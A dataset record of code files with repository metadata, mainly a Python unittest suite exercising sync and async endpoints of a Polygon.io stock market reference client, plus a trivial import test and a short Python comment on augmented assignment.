hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f6127632022f5cc00e048d1782b414138296778b
| 25,336
|
py
|
Python
|
tests/reference_tests.py
|
webclinic017/polygon
|
bddbb6ab7a250d3a40f88c8973484c399b72d7d5
|
[
"MIT"
] | null | null | null |
tests/reference_tests.py
|
webclinic017/polygon
|
bddbb6ab7a250d3a40f88c8973484c399b72d7d5
|
[
"MIT"
] | null | null | null |
tests/reference_tests.py
|
webclinic017/polygon
|
bddbb6ab7a250d3a40f88c8973484c399b72d7d5
|
[
"MIT"
] | null | null | null |
# ========================================================= #
import unittest
import polygon
from polygon import cred
import datetime
from requests.models import Response
import asyncio
from httpx import Response as HttpxResponse
import polygon.enums as enums
# ========================================================= #
# Test Runners
# ========================================================= #
# Helper Function for testing asyncio components
def async_test(coro):
    """Decorator that lets unittest run an ``async def`` test method.

    Wraps *coro* in a synchronous callable that executes the coroutine to
    completion on a fresh event loop via :func:`asyncio.run`, which also
    closes the loop and shuts down async generators afterwards (the manual
    new_event_loop/close dance did not do the latter).

    :param coro: the coroutine function to wrap.
    :return: a plain function with the same signature and metadata.
    """
    import functools

    @functools.wraps(coro)  # preserve __name__/__doc__ for test reporting
    def wrapper(*args, **kwargs):
        return asyncio.run(coro(*args, **kwargs))

    return wrapper
# ========================================================= #
class TestReferences(unittest.TestCase):
    """Integration tests for ``polygon.ReferenceClient`` (sync and async).

    Every endpoint is exercised twice: once through the context-manager
    interface and once with an explicitly created and closed client.
    Where the endpoint supports it, plain, ``raw_response=True`` and
    paginated (``all_pages``/``max_pages``/``merge_all_pages``) call
    variants are checked.

    NOTE: these tests hit the live Polygon API and require a valid
    ``cred.KEY`` — they are integration tests, not unit tests.
    """

    def test_get_tickers(self):
        """Sync ticker listing, incl. raw response and pagination."""
        with polygon.ReferenceClient(cred.KEY) as client:
            data = client.get_tickers('AMD')
            data1 = client.get_tickers(search='GO', limit=20, market='stocks')
            data2 = client.get_tickers(symbol_type='CS', market='stocks', raw_response=True, limit=120)
            data3 = client.get_tickers(limit=5, market='stocks', all_pages=True, max_pages=2)
            data4 = client.get_tickers(limit=5, market='stocks', all_pages=True, max_pages=2,
                                       merge_all_pages=False)

            self.assertIsInstance(data, dict)
            self.assertIsInstance(data1, dict)
            self.assertIsInstance(data2, Response)
            self.assertIsInstance(data3, list)
            self.assertIsInstance(data4, list)
            self.assertIsInstance(data2.json(), dict)

            self.assertEqual(data['count'], 1)
            self.assertEqual(data1['count'], 20)
            # merged pages: 2 pages x 5 items; unmerged: one entry per page
            self.assertEqual(len(data3), 10)
            self.assertEqual(len(data4), 2)
            self.assertEqual(data2.json()['count'], 120)

        # Testing without context manager
        client = polygon.ReferenceClient(cred.KEY)
        data = client.get_tickers(search='GO', limit=30, market='stocks')
        data1 = client.get_next_page(data)
        client.close()

        self.assertIsInstance(data, dict)
        self.assertIsInstance(data1, dict)
        self.assertEqual(data['count'], 30)
        self.assertEqual(data1['count'], 30)

    def test_get_ticker_types(self):
        """Sync ticker types endpoint."""
        with polygon.ReferenceClient(cred.KEY) as client:
            data = client.get_ticker_types()
            data1 = client.get_ticker_types(asset_class='stocks', raw_response=True)

            self.assertIsInstance(data, dict)
            self.assertIsInstance(data1, Response)
            self.assertIsInstance(data1.json(), dict)

            self.assertEqual(data['status'], 'OK')
            self.assertEqual(data1.json()['status'], 'OK')

        # without context manager
        client = polygon.ReferenceClient(cred.KEY)
        data = client.get_ticker_types()
        client.close()

        self.assertIsInstance(data, dict)
        self.assertEqual(data['status'], 'OK')

    def test_get_ticker_details(self):
        """Sync ticker details endpoint (with and without a date)."""
        with polygon.ReferenceClient(cred.KEY) as client:
            data = client.get_ticker_details('AMD')
            data1 = client.get_ticker_details('AMD', date='2021-06-28', raw_response=True)

            self.assertIsInstance(data, dict)
            self.assertIsInstance(data1, Response)
            self.assertIsInstance(data1.json(), dict)

            self.assertEqual(data['status'], 'OK')
            self.assertEqual(data1.json()['status'], 'OK')

        # without context manager
        client = polygon.ReferenceClient(cred.KEY)
        data = client.get_ticker_details('AMD')
        client.close()

        self.assertIsInstance(data, dict)
        self.assertEqual(data['status'], 'OK')

    def test_get_option_contracts(self):
        """Sync option contracts endpoint, incl. pagination."""
        with polygon.ReferenceClient(cred.KEY) as client:
            data = client.get_option_contracts('AMD', limit=10)
            data1 = client.get_option_contracts('AMD', limit=10, contract_type='call', raw_response=True)
            data3 = client.get_option_contracts('AMD', limit=5, all_pages=True, max_pages=2)
            data4 = client.get_option_contracts('AMD', limit=5, all_pages=True, max_pages=2, merge_all_pages=False)

            self.assertIsInstance(data, dict)
            self.assertIsInstance(data1, Response)
            self.assertIsInstance(data3, list)
            # FIX: this assertion originally re-checked data3 instead of data4
            self.assertIsInstance(data4, list)
            self.assertIsInstance(data1.json(), dict)

            self.assertEqual(data['status'], 'OK')
            self.assertEqual(len(data3), 10)
            self.assertEqual(len(data4), 2)
            self.assertEqual(data1.json()['status'], 'OK')

        # without context manager
        client = polygon.ReferenceClient(cred.KEY)
        data = client.get_option_contracts('AMD', limit=10)
        client.close()

        self.assertIsInstance(data, dict)
        self.assertEqual(data['status'], 'OK')

    def test_get_ticker_news(self):
        """Sync ticker news endpoint, incl. pagination and next page."""
        with polygon.ReferenceClient(cred.KEY) as client:
            data = client.get_ticker_news(limit=10)
            data1 = client.get_ticker_news('AMD', limit=10, raw_response=True)
            data3 = client.get_ticker_news(limit=5, all_pages=True, max_pages=2)
            data4 = client.get_ticker_news(limit=5, all_pages=True, max_pages=2, merge_all_pages=False)

            self.assertIsInstance(data, dict)
            self.assertIsInstance(data1, Response)
            self.assertIsInstance(data3, list)
            self.assertIsInstance(data4, list)
            self.assertIsInstance(data1.json(), dict)

            self.assertEqual(data['status'], 'OK')
            self.assertEqual(len(data3), 10)
            self.assertEqual(len(data4), 2)
            self.assertEqual(data1.json()['status'], 'OK')

        # without context manager
        client = polygon.ReferenceClient(cred.KEY)
        data = client.get_ticker_news('AMD', limit=10)
        data1 = client.get_next_page(data)
        client.close()

        self.assertIsInstance(data, dict)
        self.assertIsInstance(data1, dict)
        self.assertEqual(data['status'], 'OK')
        self.assertEqual(data1['status'], 'OK')

    def test_get_stock_dividends(self):
        """Sync stock dividends endpoint, incl. pagination."""
        with polygon.ReferenceClient(cred.KEY) as client:
            data = client.get_stock_dividends('AMD')
            data1 = client.get_stock_dividends('AMD', raw_response=True)
            data3 = client.get_stock_dividends('AMD', limit=5, all_pages=True, max_pages=2)
            data4 = client.get_stock_dividends('AMD', limit=5, all_pages=True, max_pages=2, merge_all_pages=False)

            self.assertIsInstance(data, dict)
            self.assertIsInstance(data1, Response)
            self.assertIsInstance(data3, list)
            self.assertIsInstance(data4, list)
            self.assertIsInstance(data1.json(), dict)

            self.assertEqual(data['status'], 'OK')
            # dividend history may have fewer entries than the page budget
            self.assertEqual(len(data3) <= 10, True)
            self.assertEqual(len(data4) <= 2, True)
            self.assertEqual(data1.json()['status'], 'OK')

        # without context manager
        client = polygon.ReferenceClient(cred.KEY)
        data = client.get_stock_dividends('AMD')
        client.close()

        self.assertIsInstance(data, dict)
        self.assertEqual(data['status'], 'OK')

    def test_get_stock_financials_vx(self):
        """Sync vX stock financials endpoint."""
        with polygon.ReferenceClient(cred.KEY) as client:
            data = client.get_stock_financials_vx('AMD', limit=10)
            data1 = client.get_stock_financials_vx('AMD', include_sources=True, raw_response=True)

            self.assertIsInstance(data, dict)
            self.assertIsInstance(data1, Response)
            self.assertIsInstance(data1.json(), dict)

            self.assertEqual(data['status'], 'OK')
            self.assertEqual(data1.json()['status'], 'OK')

        # without context manager
        client = polygon.ReferenceClient(cred.KEY)
        data = client.get_stock_financials_vx('AMD', limit=10)
        client.close()

        self.assertIsInstance(data, dict)
        self.assertEqual(data['status'], 'OK')

    def test_get_stock_splits(self):
        """Sync stock splits endpoint, incl. pagination."""
        with polygon.ReferenceClient(cred.KEY) as client:
            data = client.get_stock_splits('AMD')
            data1 = client.get_stock_splits('AMD', raw_response=True)
            data3 = client.get_stock_splits('AMD', limit=5, all_pages=True, max_pages=2)
            data4 = client.get_stock_splits('AMD', limit=5, all_pages=True, max_pages=2, merge_all_pages=False)

            self.assertIsInstance(data, dict)
            self.assertIsInstance(data1, Response)
            self.assertIsInstance(data3, list)
            self.assertIsInstance(data4, list)
            self.assertIsInstance(data1.json(), dict)

            self.assertEqual(data['status'], 'OK')
            # split history may have fewer entries than the page budget
            self.assertEqual(len(data3) <= 10, True)
            self.assertEqual(len(data4) <= 2, True)
            self.assertEqual(data1.json()['status'], 'OK')

        # without context manager
        client = polygon.ReferenceClient(cred.KEY)
        data = client.get_stock_splits('AMD')
        client.close()

        self.assertIsInstance(data, dict)
        self.assertEqual(data['status'], 'OK')

    def test_get_market_holidays(self):
        """Sync market holidays endpoint (returns a list)."""
        with polygon.ReferenceClient(cred.KEY) as client:
            data = client.get_market_holidays()
            data1 = client.get_market_holidays(raw_response=True)

            self.assertIsInstance(data, list)
            self.assertIsInstance(data1, Response)
            self.assertIsInstance(data1.json(), list)

        # without context manager
        client = polygon.ReferenceClient(cred.KEY)
        data = client.get_market_holidays()
        client.close()

        self.assertIsInstance(data, list)

    def test_get_market_status(self):
        """Sync market status endpoint."""
        with polygon.ReferenceClient(cred.KEY) as client:
            data = client.get_market_status()
            data1 = client.get_market_status(raw_response=True)

            self.assertIsInstance(data, dict)
            self.assertIsInstance(data1, Response)
            self.assertIsInstance(data1.json(), dict)

        # without context manager
        client = polygon.ReferenceClient(cred.KEY)
        data = client.get_market_status()
        client.close()

        self.assertIsInstance(data, dict)

    def test_get_condition_mappings(self):
        """Sync condition mappings endpoint (trades and quotes)."""
        with polygon.ReferenceClient(cred.KEY) as client:
            data = client.get_condition_mappings()
            data1 = client.get_condition_mappings('quotes', raw_response=True)

            self.assertIsInstance(data, dict)
            self.assertIsInstance(data1, Response)
            self.assertIsInstance(data1.json(), dict)

        # without context manager
        client = polygon.ReferenceClient(cred.KEY)
        data = client.get_condition_mappings('trades')
        client.close()

        self.assertIsInstance(data, dict)

    def test_get_conditions(self):
        """Sync conditions endpoint."""
        with polygon.ReferenceClient(cred.KEY) as client:
            data = client.get_conditions()
            data1 = client.get_conditions('options', data_type='nbbo', raw_response=True)

            self.assertIsInstance(data, dict)
            self.assertIsInstance(data1, Response)
            self.assertIsInstance(data1.json(), dict)

            self.assertEqual(data['status'], 'OK')
            self.assertEqual(data1.json()['status'], 'OK')

        # without context manager
        client = polygon.ReferenceClient(cred.KEY)
        data = client.get_conditions()
        client.close()

        self.assertIsInstance(data, dict)
        self.assertEqual(data['status'], 'OK')

    def test_get_exchanges(self):
        """Sync exchanges endpoint."""
        with polygon.ReferenceClient(cred.KEY) as client:
            data = client.get_exchanges()
            data1 = client.get_exchanges('stocks', raw_response=True)

            self.assertIsInstance(data, dict)
            self.assertIsInstance(data1, Response)
            self.assertIsInstance(data1.json(), dict)

            self.assertEqual(data['status'], 'OK')
            self.assertEqual(data1.json()['status'], 'OK')

        # without context manager
        client = polygon.ReferenceClient(cred.KEY)
        data = client.get_exchanges(locale='us')
        client.close()

        self.assertIsInstance(data, dict)
        self.assertEqual(data['status'], 'OK')

    @async_test
    async def test_async_get_tickers(self):
        """Async ticker listing, incl. raw response and pagination."""
        async with polygon.ReferenceClient(cred.KEY, use_async=True) as client:
            data = await client.get_tickers('AMD')
            data1 = await client.get_tickers(search='GO', limit=20, market='stocks')
            data2 = await client.get_tickers(symbol_type='CS', market='stocks', raw_response=True, limit=120)
            data3 = await client.get_tickers(limit=5, market='stocks', all_pages=True, max_pages=2)
            data4 = await client.get_tickers(limit=5, market='stocks', all_pages=True, max_pages=2,
                                             merge_all_pages=False)

            self.assertIsInstance(data, dict)
            self.assertIsInstance(data1, dict)
            self.assertIsInstance(data2, HttpxResponse)
            self.assertIsInstance(data3, list)
            self.assertIsInstance(data4, list)
            self.assertIsInstance(data2.json(), dict)

            self.assertEqual(data['count'], 1)
            self.assertEqual(data1['count'], 20)
            self.assertEqual(len(data3), 10)
            self.assertEqual(len(data4), 2)
            self.assertEqual(data2.json()['count'], 120)

        # Testing without context manager
        client = polygon.ReferenceClient(cred.KEY, True)
        data = await client.get_tickers(search='GO', limit=30, market='stocks')
        data1 = await client.get_next_page(data)
        await client.close()

        self.assertIsInstance(data, dict)
        self.assertIsInstance(data1, dict)
        self.assertEqual(data['count'], 30)
        self.assertEqual(data1['count'], 30)

    @async_test
    async def test_async_get_ticker_types(self):
        """Async ticker types endpoint."""
        async with polygon.ReferenceClient(cred.KEY, True) as client:
            data = await client.get_ticker_types()
            data1 = await client.get_ticker_types(asset_class='stocks', raw_response=True)

            self.assertIsInstance(data, dict)
            self.assertIsInstance(data1, HttpxResponse)
            self.assertIsInstance(data1.json(), dict)

            self.assertEqual(data['status'], 'OK')
            self.assertEqual(data1.json()['status'], 'OK')

        # without context manager
        client = polygon.ReferenceClient(cred.KEY, True)
        data = await client.get_ticker_types()
        await client.close()

        self.assertIsInstance(data, dict)
        self.assertEqual(data['status'], 'OK')

    @async_test
    async def test_async_get_ticker_details(self):
        """Async ticker details endpoint (with and without a date)."""
        async with polygon.ReferenceClient(cred.KEY, True) as client:
            data = await client.get_ticker_details('AMD')
            data1 = await client.get_ticker_details('AMD', date='2021-06-28', raw_response=True)

            self.assertIsInstance(data, dict)
            self.assertIsInstance(data1, HttpxResponse)
            self.assertIsInstance(data1.json(), dict)

            self.assertEqual(data['status'], 'OK')
            self.assertEqual(data1.json()['status'], 'OK')

        # without context manager
        client = polygon.ReferenceClient(cred.KEY, True)
        data = await client.get_ticker_details('AMD')
        await client.close()

        self.assertIsInstance(data, dict)
        self.assertEqual(data['status'], 'OK')

    @async_test
    async def test_async_get_option_contracts(self):
        """Async option contracts endpoint, incl. pagination."""
        async with polygon.ReferenceClient(cred.KEY, True) as client:
            data = await client.get_option_contracts('AMD', limit=10)
            data1 = await client.get_option_contracts('AMD', limit=10, contract_type='call', raw_response=True)
            data3 = await client.get_option_contracts('AMD', limit=5, all_pages=True, max_pages=2)
            data4 = await client.get_option_contracts('AMD', limit=5, all_pages=True, max_pages=2,
                                                      merge_all_pages=False)

            self.assertIsInstance(data, dict)
            self.assertIsInstance(data1, HttpxResponse)
            self.assertIsInstance(data3, list)
            # FIX: this assertion originally re-checked data3 instead of data4
            self.assertIsInstance(data4, list)
            self.assertIsInstance(data1.json(), dict)

            self.assertEqual(data['status'], 'OK')
            self.assertEqual(len(data3), 10)
            self.assertEqual(len(data4), 2)
            self.assertEqual(data1.json()['status'], 'OK')

        # without context manager
        client = polygon.ReferenceClient(cred.KEY, True)
        data = await client.get_option_contracts('AMD', limit=10)
        await client.close()

        self.assertIsInstance(data, dict)
        self.assertEqual(data['status'], 'OK')

    @async_test
    async def test_async_get_ticker_news(self):
        """Async ticker news endpoint, incl. pagination and next page."""
        async with polygon.ReferenceClient(cred.KEY, True) as client:
            data = await client.get_ticker_news(limit=10)
            data1 = await client.get_ticker_news('AMD', limit=10, raw_response=True)
            data3 = await client.get_ticker_news(limit=5, all_pages=True, max_pages=2)
            data4 = await client.get_ticker_news(limit=5, all_pages=True, max_pages=2, merge_all_pages=False)

            self.assertIsInstance(data, dict)
            self.assertIsInstance(data1, HttpxResponse)
            self.assertIsInstance(data3, list)
            self.assertIsInstance(data4, list)
            self.assertIsInstance(data1.json(), dict)

            self.assertEqual(data['status'], 'OK')
            self.assertEqual(len(data3), 10)
            self.assertEqual(len(data4), 2)
            self.assertEqual(data1.json()['status'], 'OK')

        # without context manager
        client = polygon.ReferenceClient(cred.KEY, True)
        data = await client.get_ticker_news('AMD', limit=10)
        data1 = await client.get_next_page(data)
        await client.close()

        self.assertIsInstance(data, dict)
        self.assertIsInstance(data1, dict)
        self.assertEqual(data['status'], 'OK')
        self.assertEqual(data1['status'], 'OK')

    @async_test
    async def test_async_get_stock_dividends(self):
        """Async stock dividends endpoint, incl. pagination."""
        async with polygon.ReferenceClient(cred.KEY, True) as client:
            data = await client.get_stock_dividends('AMD')
            data1 = await client.get_stock_dividends('AMD', raw_response=True)
            data3 = await client.get_stock_dividends('AMD', limit=5, all_pages=True, max_pages=2)
            data4 = await client.get_stock_dividends('AMD', limit=5, all_pages=True, max_pages=2, merge_all_pages=False)

            self.assertIsInstance(data, dict)
            self.assertIsInstance(data1, HttpxResponse)
            self.assertIsInstance(data3, list)
            self.assertIsInstance(data4, list)
            self.assertIsInstance(data1.json(), dict)

            self.assertEqual(data['status'], 'OK')
            # dividend history may have fewer entries than the page budget
            self.assertEqual(len(data3) <= 10, True)
            self.assertEqual(len(data4) <= 2, True)
            self.assertEqual(data1.json()['status'], 'OK')

        # without context manager
        client = polygon.ReferenceClient(cred.KEY, True)
        data = await client.get_stock_dividends('AMD')
        await client.close()

        self.assertIsInstance(data, dict)
        self.assertEqual(data['status'], 'OK')

    @async_test
    async def test_async_get_stock_financials_vx(self):
        """Async vX stock financials endpoint."""
        async with polygon.ReferenceClient(cred.KEY, True) as client:
            data = await client.get_stock_financials_vx('AMD', limit=10)
            data1 = await client.get_stock_financials_vx('AMD', include_sources=True, raw_response=True)

            self.assertIsInstance(data, dict)
            self.assertIsInstance(data1, HttpxResponse)
            self.assertIsInstance(data1.json(), dict)

            self.assertEqual(data['status'], 'OK')
            self.assertEqual(data1.json()['status'], 'OK')

        # without context manager
        client = polygon.ReferenceClient(cred.KEY, True)
        data = await client.get_stock_financials_vx('AMD', limit=10)
        await client.close()

        self.assertIsInstance(data, dict)
        self.assertEqual(data['status'], 'OK')

    @async_test
    async def test_async_get_stock_splits(self):
        """Async stock splits endpoint, incl. pagination."""
        async with polygon.ReferenceClient(cred.KEY, True) as client:
            data = await client.get_stock_splits('AMD')
            data1 = await client.get_stock_splits('AMD', raw_response=True)
            data3 = await client.get_stock_splits('AMD', limit=5, all_pages=True, max_pages=2)
            data4 = await client.get_stock_splits('AMD', limit=5, all_pages=True, max_pages=2, merge_all_pages=False)

            self.assertIsInstance(data, dict)
            self.assertIsInstance(data1, HttpxResponse)
            self.assertIsInstance(data3, list)
            self.assertIsInstance(data4, list)
            self.assertIsInstance(data1.json(), dict)

            self.assertEqual(data['status'], 'OK')
            # split history may have fewer entries than the page budget
            self.assertEqual(len(data3) <= 10, True)
            self.assertEqual(len(data4) <= 2, True)
            self.assertEqual(data1.json()['status'], 'OK')

        # without context manager
        client = polygon.ReferenceClient(cred.KEY, True)
        data = await client.get_stock_splits('AMD')
        await client.close()

        self.assertIsInstance(data, dict)
        self.assertEqual(data['status'], 'OK')

    @async_test
    async def test_async_get_market_holidays(self):
        """Async market holidays endpoint (returns a list)."""
        async with polygon.ReferenceClient(cred.KEY, True) as client:
            data = await client.get_market_holidays()
            data1 = await client.get_market_holidays(raw_response=True)

            self.assertIsInstance(data, list)
            self.assertIsInstance(data1, HttpxResponse)
            self.assertIsInstance(data1.json(), list)

        # without context manager
        client = polygon.ReferenceClient(cred.KEY, True)
        data = await client.get_market_holidays()
        await client.close()

        self.assertIsInstance(data, list)

    @async_test
    async def test_async_get_market_status(self):
        """Async market status endpoint."""
        async with polygon.ReferenceClient(cred.KEY, True) as client:
            data = await client.get_market_status()
            data1 = await client.get_market_status(raw_response=True)

            self.assertIsInstance(data, dict)
            self.assertIsInstance(data1, HttpxResponse)
            self.assertIsInstance(data1.json(), dict)

        # without context manager
        client = polygon.ReferenceClient(cred.KEY, True)
        data = await client.get_market_status()
        await client.close()

        self.assertIsInstance(data, dict)

    @async_test
    async def test_async_get_condition_mappings(self):
        """Async condition mappings endpoint (trades and quotes)."""
        async with polygon.ReferenceClient(cred.KEY, True) as client:
            data = await client.get_condition_mappings()
            data1 = await client.get_condition_mappings('quotes', raw_response=True)

            self.assertIsInstance(data, dict)
            self.assertIsInstance(data1, HttpxResponse)
            self.assertIsInstance(data1.json(), dict)

        # without context manager
        client = polygon.ReferenceClient(cred.KEY, True)
        data = await client.get_condition_mappings('trades')
        await client.close()

        self.assertIsInstance(data, dict)

    @async_test
    async def test_async_get_conditions(self):
        """Async conditions endpoint."""
        async with polygon.ReferenceClient(cred.KEY, True) as client:
            data = await client.get_conditions()
            data1 = await client.get_conditions('options', data_type='nbbo', raw_response=True)

            self.assertIsInstance(data, dict)
            self.assertIsInstance(data1, HttpxResponse)
            self.assertIsInstance(data1.json(), dict)

            self.assertEqual(data['status'], 'OK')
            self.assertEqual(data1.json()['status'], 'OK')

        # without context manager
        client = polygon.ReferenceClient(cred.KEY, True)
        data = await client.get_conditions()
        await client.close()

        self.assertIsInstance(data, dict)
        self.assertEqual(data['status'], 'OK')

    @async_test
    async def test_async_get_exchanges(self):
        """Async exchanges endpoint."""
        async with polygon.ReferenceClient(cred.KEY, True) as client:
            data = await client.get_exchanges()
            data1 = await client.get_exchanges('stocks', raw_response=True)

            self.assertIsInstance(data, dict)
            self.assertIsInstance(data1, HttpxResponse)
            self.assertIsInstance(data1.json(), dict)

            self.assertEqual(data['status'], 'OK')
            self.assertEqual(data1.json()['status'], 'OK')

        # without context manager
        client = polygon.ReferenceClient(cred.KEY, True)
        data = await client.get_exchanges(locale='us')
        await client.close()

        self.assertIsInstance(data, dict)
        self.assertEqual(data['status'], 'OK')
# ========================================================= #
# Run the reference-client test suite when this module is executed directly.
if __name__ == '__main__':
    unittest.main()
# ========================================================= #
| 41.602627
| 120
| 0.62796
| 2,784
| 25,336
| 5.571121
| 0.044899
| 0.167634
| 0.087041
| 0.097228
| 0.952547
| 0.935719
| 0.91844
| 0.907672
| 0.895745
| 0.872534
| 0
| 0.017194
| 0.247079
| 25,336
| 608
| 121
| 41.671053
| 0.795869
| 0.041522
| 0
| 0.755991
| 0
| 0
| 0.033991
| 0
| 0
| 0
| 0
| 0
| 0.470588
| 1
| 0.03268
| false
| 0
| 0.017429
| 0
| 0.056645
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f64ac8ffeace3807f7c53a8ed1d1414948d44f90
| 81
|
py
|
Python
|
tests/test_Time-for-an-Adventure.py
|
EthanKubistek/Time_for_an_Adventure
|
ab6fa19e9054f710043c3c22b354fd2123defd0d
|
[
"MIT"
] | null | null | null |
tests/test_Time-for-an-Adventure.py
|
EthanKubistek/Time_for_an_Adventure
|
ab6fa19e9054f710043c3c22b354fd2123defd0d
|
[
"MIT"
] | null | null | null |
tests/test_Time-for-an-Adventure.py
|
EthanKubistek/Time_for_an_Adventure
|
ab6fa19e9054f710043c3c22b354fd2123defd0d
|
[
"MIT"
] | null | null | null |
import Time_for_an_Adventure
def test_import():
    """Smoke test: the package imports and yields a module object."""
    # The module-level import already ran; a non-None module object here
    # confirms the import machinery succeeded.
    assert Time_for_an_Adventure is not None
| 20.25
| 32
| 0.839506
| 13
| 81
| 4.692308
| 0.615385
| 0.229508
| 0.295082
| 0.590164
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.123457
| 81
| 4
| 32
| 20.25
| 0.859155
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.666667
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
f65de89b311f36e23a144e22129c28607ba7a7bd
| 128
|
py
|
Python
|
week_2/atribuicao_aumentada.py
|
angelitabrg/lih_lab_python2
|
88d19d20704552e1a82c29793073e59dcf4b78c6
|
[
"MIT"
] | null | null | null |
week_2/atribuicao_aumentada.py
|
angelitabrg/lih_lab_python2
|
88d19d20704552e1a82c29793073e59dcf4b78c6
|
[
"MIT"
] | null | null | null |
week_2/atribuicao_aumentada.py
|
angelitabrg/lih_lab_python2
|
88d19d20704552e1a82c29793073e59dcf4b78c6
|
[
"MIT"
] | null | null | null |
'''
2 - Augmented assignment (e.g.: x += 5):
x = 10
x = x + 10 # x=20
x += 10 # x=30
x *= 2 # x=60
x = 2
x **= 10 # x=1024
'''
| 10.666667
| 39
| 0.429688
| 27
| 128
| 2.037037
| 0.407407
| 0.218182
| 0.290909
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 0.3125
| 128
| 12
| 40
| 10.666667
| 0.375
| 0.929688
| 0
| null | 0
| null | 0
| 0
